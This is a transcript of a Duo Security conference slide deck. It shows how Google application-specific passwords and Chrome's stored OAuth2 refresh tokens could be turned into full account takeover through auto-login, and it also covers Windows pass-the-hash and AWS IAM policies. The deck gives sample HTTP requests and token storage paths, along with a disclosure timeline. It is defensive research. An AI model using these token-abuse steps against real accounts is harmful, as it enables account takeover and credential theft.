Security exploits of Google application specific passwords & Chrome’s OAuth2 tokens
-
Upload
duo-security -
Category
Technology
-
view
1.461 -
download
3
description
Transcript of Security exploits of Google application specific passwords & Chrome’s OAuth2 tokens
Bypassing Strong Authentication... With
Passwords?!Adam Goodman
[email protected] - 2013-07-31
duosecurity.com
1
0. Kill The Password?
duosecurity.com
2
duosecurity.com
3
duosecurity.com
4
duosecurity.com
5
1. Bypassing Google’s 2-Factor Authentication
duosecurity.com
6
duosecurity.com
7
duosecurity.com
8
Google’s 2-Step Verification
duosecurity.com
9
Google’s 2-Step Verification
duosecurity.com
10
What About Non-Web-Based Logins?
Thick-Client Protocols‣ IMAP‣CalDAV‣XMPP‣ ...
Google Software (Interim Solution)‣Android‣Chrome
duosecurity.com
11
Application-Specific Passwords
duosecurity.com
12
Application-Specific Passwords
‣16 lowercase letters‣Randomly-Generated by Google‣ Individually Revokable‣Not intended to be memorized
sounds a bit like...duosecurity.com
13
ASPs vs. OAuth Tokens
‣ASPs have to be generated manually‣ASPs aren’t actually Application-Specific!
duosecurity.com
14
Not-So-Application-Specific
“Another weakness of ASP is the misimpression that is provides application-limited rather than full-scope account access.”
- Authentication at Scale, appearing in IEEE S&P Magazine vol. 11, no. 1
duosecurity.com
15
Detour: Android Auto-Login
Also:‣Chromebooks‣Desktop versions of Chrome (if enabled in chrome://flags)‣ ...?
duosecurity.com16
Detour: Android Auto-Login
Worked even for the most sensitive parts ofhttps://accounts.google.com:‣2FA settings: https://accounts.google.com/b/0/SmsAuthConfig?hl=en‣Account-Recovery Settings:https://accounts.google.com/b/0/UpdateAccountRecoveryOptions?hl=en&service=oz
duosecurity.com
17
So...
‣ASPs can link an Android device, and‣With auto-login, Android devices could - with no additional authentication - take over your account completely!
duosecurity.com
18
Let’s Figure Out How This Works...
Android HTTPS Interception, v1‣Real Device (Google Nexus S) with a custom default gateway‣Linux Desktop, running sslsniff‣ http://www.thoughtcrime.org/software/sslsniff/‣Custom CA certificate
duosecurity.com
19
Let’s Figure Out How This Works...
Android HTTPS Interception, v2‣Android Emulator‣ $ emulator -http-proxy localhost:8080 @avd_name‣Burp Suite Proxy‣ http://portswigger.net/burp/‣Custom CA certificate
duosecurity.com
20
duosecurity.com
21
Basic Workflow
‣POST to https://android.clients.google.com/auth ‣ Send Email, EncryptedPasswd, service=ac2dm‣ Receive “Token”
‣POST to https://android.clients.google.com/auth‣ Send Email, Token, service=urlquote(“weblogin:continue=https://accounts.google.com/ManageAccount”)
‣ Receive “MergeSession” URL‣Open the MergeSession URL; get instantly logged into your account!
duosecurity.com
22
Step 1
POST /auth HTTP/1.1Host: android.clients.google.com...
accountType=HOSTED_OR_GOOGLE&Email=akgood%40arbsec.org&has_permission=1&add_account=1&EncryptedPasswd=AFcb4...&service=ac2dm&source=android&androidId=3281f33679ccc6c6&device_country=us&operatorCountry=us&lang=en&sdk_version=17
duosecurity.com
23
Step 1
HTTP/1.1 200 OK...
SID=DQAAANwAAAVMG4uYt2HaF...Auth=DQAAAOAAAACRbLC5-dgM...services=goanna_mobile,apps,[email protected]=1/fXrv8D3fLP1mOBj3o1...GooglePlusUpgrade=1firstName=AdamlastName=Goodman
duosecurity.com
24
Step 1: EncryptedPasswd?
POST /auth HTTP/1.1Host: android.clients.google.com...
accountType=HOSTED_OR_GOOGLE&Email=akgood%40arbsec.org&has_permission=1&add_account=1&Passwd=xxxxxxxxxxxxxxxx&service=ac2dm&source=android&androidId=3281f33679ccc6c6&device_country=us&operatorCountry=us&lang=en&sdk_version=17
duosecurity.com
25
Step 2
POST /auth HTTP/1.1Host: android.clients.google.com...accountType=HOSTED_OR_GOOGLE&Email=akgood%arbsec.org&has_permission=1&Token=1%2FfXrv8D3fLP1mOBj3o1......&service=weblogin%3Acontinue%3Dhttps%253A%252F%252Faccounts.google.com%252FManageAccount&source=android&androidId=3281f33679ccc6c6&app=com.android.browser&client_sig=61ed377e85d386a8dfee6b864bd85b0bfaa5af81&device_country=us&operatorCountry=us&lang=en&sdk_version=17
duosecurity.com
26
Step 2
HTTP/1.1 200 OK...
Auth=https://accounts.google.com/MergeSession?args=continue%3Dhttps%253A%252F%252Faccounts.google.com%252FManageAccount&uberauth=AP...&source=AndroidWebLoginExpiry=0
duosecurity.com
27
Simplified Workflow
‣POST to https://android.clients.google.com/auth‣ Send Email, Passwd, service=urlquote(“weblogin:continue=https://accounts.google.com/ManageAccount”)
‣ Receive “MergeSession” URL
Go from Application-Specific Password to full account takeover with one API call!duosecurity.com
28
Timeline
‣2012/07/16: Duo researchers confirm presence of ASP weakness.‣2012/07/18: Issue reported to [email protected].‣2012/07/20: Communication with Google Security Team clarifying the issue.‣2012/07/24: Issue is confirmed and deemed “expected behavior” by Google Security Team.‣2013/02/21: Fix is pushed by Google to prevent ASP-initiated sessions from accessing sensitive account interfaces.‣2013/02/25: Public disclosure by Duo.
duosecurity.com
29
Google’s Fix
‣Sensitive account-settings pages are no longer accessible via auto-login (you must enter username/password/OTP)‣~Nothing else has changed
duosecurity.com
30
Multiple Discovery
‣http://grkvlt.blogspot.co.uk/2012/08/google-tfa-security-issue.html‣http://connect.ncircle.com/ncircle/attachments/ncircle/VERTBlog/173/1/CraigYoung_BSidesSlides-2SV.pdf
duosecurity.com
31
Evaluation
duosecurity.com
32
2-step Verification Still Helps...
‣Phishing‣Password-sharing between services (with insecure password databases)
duosecurity.com
33
... But ASPs Can Be Stolen
HTTPS Man-In-The-Middle‣Thick-client applications are notoriously bad at checking SSL certificates:https://crypto.stanford.edu/~dabo/pubs/abstracts/ssl-client-bugs.html
Malware can grab stored passwords...‣Windows: Data Protection API‣ Encrypts data using a key derived from the user’s logon credential
‣ Any process running under the same user account can decrypt any DPAPI-protected data
‣OS X: Keychain‣ Stronger: per-application permissions
Plaintext...duosecurity.com
34
Case Study: Pidgin
‣Plain-Text Passwords!‣ https://developer.pidgin.im/wiki/PlainTextPasswords‣GTalk / “Hangouts” - (probably) low impact if compromised‣ If we were storing a credential that only had access to your GTalk account, then storing it in plaintext might be ~OK
‣GMail - (probably) high impact if compromised‣ ... all of your other accounts on the internet?!
duosecurity.com
35
Not Just Application-Specific Passwords
‣Chrome on Windows / Mac / Linux has the same “auto-login” functionality‣ ... but it’s using OAuth2 now!
duosecurity.com
36
Workflow
‣POST to https://accounts.google.com/o/oauth2/token‣ send refresh_token, client_id, client_secret (the latter two are hardcoded into Chrome)‣ receive access_token‣GET to https://accounts.google.com/OAuthLogin?source=ChromiumBrowser&issueuberauth=1‣ send access_token in Authorization header‣ get “uberauth” token back‣Use “uberauth” token to construct a MergeSession URL
duosecurity.com
37
How Is The Refresh Token Stored?
from (e.g.) ~/Library/Application Support/Google/Chrome/Default/Preferences:
... "oauth2LoginRefreshToken": { "status": "Successful", "value": "1/0209_TGZzDyfxwozFV..." }...
duosecurity.com
38
OAuth2 Won’t (automagically) Save You
Unexpected threat models:‣Access to your tabs/bookmarks/history/etc. vs access to your entire Google account!
duosecurity.com
39
2. Passing The Hash In Windows Networks... Even When
Passwords Are “Disabled”
(borrowing in part fromhttp://www.foofus.net/~hinge/presos/insidious-implicit-windows-trust-relationships.pdf)
duosecurity.com
40
Local vs Domain Logins
‣Local‣ Password hashes are stored on your workstation
‣Domain‣ Password hashes stored on the Domain Controller
‣ Your workstation will cache them, sometimes
‣Both Local and Domain accounts can be administrators on your workstation
WorkstationWorkstation
Workstation
Other ServerDomain Controller
duosecurity.com
41
Authentication In Windows Networks
‣NTLM Authentication‣Kerberos‣ ...
duosecurity.com
42
NTLM Authentication
‣Challenge-Handshake Protocol‣Uses NTLM Hash of user’s password, not the password itself!‣ One-way hash function‣ No salting, no PBKDF2 ...‣Extremely pervasive in Windows ecosystems‣ RPCs‣ SMB mounts‣ ...
duosecurity.com
43
Pass-The-Hash
NTLM Authentication only requires the NTLM Hash!‣Gain local admin rights on a single workstation (somehow...)‣Extract NTLM Hashes‣Use them to compromise other machines in the network!
Workstation
Workstation
Domain Controller
Workstation
Other Server
duosecurity.com
44
What About Smart-Cards?
Public/Private Key-pair and Certificate stored on cryptographic hardware‣Private Key can “never” be extracted‣Authenticate by asking the smartcard to digitally-sign a value (basically, Challenge-Handshake)‣Windows can do Certificate-based user authentication
Sounds much better, right?
duosecurity.com
45
What About Smart-Cards?
“In order to support NTLM authentication [MS-NLMP] for applications connecting to network services that do not support Kerberos authentication, when PKCA is used, the KDC returns the user's NTLM one-way function (OWF) in the privilege attribute certificate (PAC) PAC_CREDENTIAL_INFO buffer ([MS-PAC] section 2.6.1).”
- [MS-PKCA]: Public Key Cryptography for Initial Authentication (PKINIT) in Kerberos Protocol http://msdn.microsoft.com/en-us/library/cc238455.aspx
duosecurity.com
46
Evaluation
Smart-cards still can help...‣Weak Passwords‣Shared Passwords between accounts / systems
But Pass-The-Hash attacks can still be a threat!
duosecurity.com
47
3. Some Conclusions
duosecurity.com
48
Real-world ecosystems tend to have multiple, distinct authentication scenarios...... passwords (or similar stored-secret authentication methods) are likely to continue to exist in some scenarios ......in each scenario, we must carefully balance privileges with trust
duosecurity.com
49
Authentication Scenarios and Trust
Rights‣What is the maximum set of permissions that should be granted to a user?
Integrity Level‣How strongly has a user / client authenticated?
duosecurity.com
50
4. Amazon Web Services: Identity and Access Management (IAM)
duosecurity.com
51
Identity And Access Management (IAM)
‣A single AWS account can have multiple users‣Flexible Rights-Expression Language, based on:‣ Resources (e.g. EC2 Instances, DNS zones, ...)‣ Actions (e.g. start instance, stop instance, ...)‣ Other session context (e.g. client IP address, SSL usage, whether 2FA was used, ...)
duosecurity.com
52
IAM Policy Example{ "Version":"2012-10-17", Statement: [{ "Action":["ec2:StopInstances","ec2:TerminateInstances"], "Effect":"Deny", "Resource":["*"], "Condition":{ "Null":{"aws:MultiFactorAuthAge":"true"} } }] }
Deny specific actions if a user didn’t use 2-factor authenticationduosecurity.com
53
2-Factor Authentication for API Clients
Amazon Secure Token Service‣Provide API credentials and a one-time-passcode to a specific endpoint‣Get a new set of temporary credentials back
duosecurity.com
54
Evaluation
AWS gives you all the tools to build strong, flexible authorization policies...
... but you have to actually build them!
AWS is intended for developers (and other savvy types)
duosecurity.com
55
Questions?
duosecurity.com
56